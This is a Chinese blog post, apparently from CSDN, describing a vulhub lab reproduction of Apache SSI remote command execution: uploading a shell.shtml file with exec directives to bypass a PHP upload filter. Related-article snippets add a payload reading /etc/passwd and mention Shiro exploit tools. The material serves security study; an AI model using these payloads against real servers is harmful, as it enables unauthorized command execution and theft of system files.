Apache SSI 远程命令执行漏洞

最新推荐文章于 2024-07-08 09:24:04 发布
最新推荐文章于 2024-07-08 09:24:04 发布
阅读量309 收藏 1
点赞数
文章标签: php 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49506405/article/details/123211909
版权
"该博客介绍了如何在目标服务器开启SSI与CGI支持的情况下,通过上传shtml文件并利用>语法,绕过不允许上传php文件的限制,执行任意系统命令。环境为一个支持SSI与CGI的Apache服务器,通过Burpsuit工具拦截请求,修改文件内容实现漏洞复现。"
摘要由CSDN通过智能技术生成

漏洞描述
在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用<!--#exec cmd="id" -->语法执行任意命令。

漏洞环境

运行一个支持SSI与CGI的Apache服务器:

docker-compose up -d

环境启动后,访问http://your-ip:8080/upload.php,即可看到一个上传表单。

漏洞复现

正常上传PHP文件是不允许的,我们可以上传一个shell.shtml文件:

<!--#exec cmd="ls" -->

1.上传shell.shtml文件 

2.同时利用Burpsuit拦截请求

添加<!--#exec cmd="id" -->代码

点击send!

 成功上传,然后访问shell.shtml,可见命令已成功执行:

http://IP:端口/shell.shtml

 

大王叫我来巡山666
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
apache SSI远程命令执行漏洞
afei001
01-15 208
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.1 Vulnhub搭建漏洞环境 4.2 apache SSI远程命令执行漏洞利用 5.漏洞修复 1.漏洞概述 SSI(Server Side Includes),即服务端包含。SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 通过SSI注入漏洞执行系统命令,并返回对应的结果...
Apache[多后缀文件名解析漏洞+换行解析漏洞+SSI远程命令执行漏洞]复现
weixin_45253622的博客
05-09 8243
一、多后缀文件解析漏洞 Apache的多后缀名特性: 如果一个文件有多个后缀名,那么Apache会从后(右)往前(左)辨别后缀。所以攻击者在可以上传文件的地方上传hack.php.xxx的文件,假设网站有对php的后缀进行过滤,但判断是xxx文件,不在黑名单里,安全检查就会放行,然而Apache的多后缀名特性会以倒数第二个后缀".php"为准,把该文件当做是php文件,解析执行。但是需要把 php5.conf文件中的正则表达式的“$”换成".",然后重启。 总结:Apache文件解析漏洞就是由于用户在
利用Vulnhub复现漏洞 - Apache SSI 远程命令执行漏洞
JiangBuLiu的博客
06-28 1327
Apache SSI 远程命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/httpd/ssi-rce/ 漏洞原理 在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用<!--#...
文件上传 - Apache SSI远程命令执行
Kevin's Blog
07-19 1279
文章目录一、漏洞原理二、漏洞场景/挖掘思路三、触发条件四、漏洞复现4.1 启动环境4.2 访问环境4.3 复现过程五、防御措施 一、漏洞原理   在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php / jsp / asp后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用语法执行任意命令。 Tips:(shtml释义) T1(作用?): 一些大的...
中间件安全Apache常见漏洞
最新发布
Innocence_0的博客
07-08 793
简单介绍一下apache是什么,Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将python等解释器编译到服务器中。ApacheHTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。apache
Apache SSI 远程命令执行Apache HTTPD 多后缀解析、Nginx 解析漏洞复现
m0_53042636的博客
04-12 4203
(1)、Apache SSI 远程命令执行漏洞复现。 环境搭建: 上传一个php文件,提示不支持的上传的类型。 上传一个shell.shtml文件,里面写入以下内容: 浏览器访问上传的文件,下图可以看到成功执行代码,说明存在远程命令执行漏洞。 原理:如果目标服务器开启了SSI与CGI支持;这样我们就可以上传一个可执行的shtml文件。 (2)、Apache HTTPD 多后缀解析漏洞复现 环境搭建 路径为:/vulhub/httpd/apache_parsing_vulnerability 运行:
Apache SSI远程命令执行漏洞复现
weixin_53696027的博客
02-19 202
vulhub-Apache SSI远程命令执行漏洞复现
漏洞复现----8、Apache SSI远程命令执行
七天
11-22 1485
文章目录一、SSI(服务端包含)简介1、SSI(服务端包含)简介2、SHTML简介二、漏洞复现 一、SSI(服务端包含)简介 1、SSI(服务端包含)简介 SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意代码。 SSI工作原理:将内容发送到浏览器之前,可以使用“服务器端包含 (SSI
Apache SSI 远程命令执行漏洞复现实验报告
weixin_48400575的博客
02-26 4192
Apache SSI 远程命令执行漏洞复现实验报告
07 - vulhub - Apache SSI 远程命令执行漏洞,带你碾压面试官
m0_67621628的博客
03-22 647
<!--#echo var="cat /etc/passwd" --> []( )漏洞复现 []( )环境准备 靶机环境 139.196.87.102 (vulhub) 攻击机环境 192.168.8.131 (虚拟机 Ubuntu 20、Java1.8、Burp) 启动 Apache SSI 远程命令执行漏洞 环境 1.进入 vulhub 的 ssi-rce 路径 cd /usr/local/tools/vulhub/httpd/ssi-rce 2.编译并启动环境 docker-c
Apache Shiro Padding Oracle漏洞可导致远程命令执行漏洞解决
01-09
背景:Apach Shiro官方披露其cookie持久化参数rememberMe加密算法存在漏洞,可被Padding Oracle攻击,攻击者利用Padding Oracle攻击手段可构造恶意的rememberMe值,绕过加密算法验证,执行java反序列化操作,最终可导致远程命令执行获取服务器权限,风险极大。 1,漏洞描述: Apache Shiro < 1.4.2 版本中cookie值rememberMe通过AES-128-CBC模式加密,容易受到Padding Oracle攻击。攻击者可以通过以下步骤完成攻击: 1、登录Shiro网站,获取持久化cookie中rememberMe字段的值;
shiro远程命令执行漏洞检测工具.zip
11-15
shiro远程命令执行漏洞检测工具:包括了shiro_attack_2.2和ShiroExploit.V2.51,大家可根据需要自行下载
07 - vulhub - Apache SSI 远程命令执行漏洞
易编橙 · 终身成长社群,相遇已是上上签!
10-15 1216
SSI简介: 漏洞复现之前,要知道SSI是什么,那么SSI是什么呢? SSI----即server-side includes SSI功能: SSI提供了一种对现有HTML文档增加动态内容的方法,不需要编写复杂的JSP/PHP/ASP等程序或者调用CGI程序。 SSI用法: SSI的语法格式类似HTML的注释,因此正确启用SSI之后,浏览器可以忽略他但是源码仍然可见,服务器会对特定的SSI指令解析,从而实现少量动态内容的添加。
复现Apache SSI 远程命令执行漏洞
weixin_52685785的博客
02-18 86
尝试上传shtml类型 ( )http://自己的IP:8080/upload.php。启动漏洞(docker-compose up -d)使用vulhub启动漏洞环境。查看ubuntu的IP地址。尝试上传shell.php。不支持上传php类型。
Apache SSI 远程命令执行漏洞复现
weixin_45911307的博客
04-12 262
(1)、Apache SSI 远程命令执行漏洞复现 拉取环境 访问upload.php 试着上传。Php文件 、 上传不成功 接着上传shell.shtml文件 、 上传成功 接着访问上传的文件 漏洞原理: 在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用<!--#exec cmd="id" -->语法执行任意命令。 ...
Apache SSI教程:实战与配置详解
安装后,用户可以根据官方文档自定义配置,但教程主要关注如何在Apache的配置文件(如`httpd.conf`)中添加必要的指令来支持SSI,如添加`AddType`、`Options`和`AddOutputFilter`等,以便处理`.ssi`类型的HTML文件,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值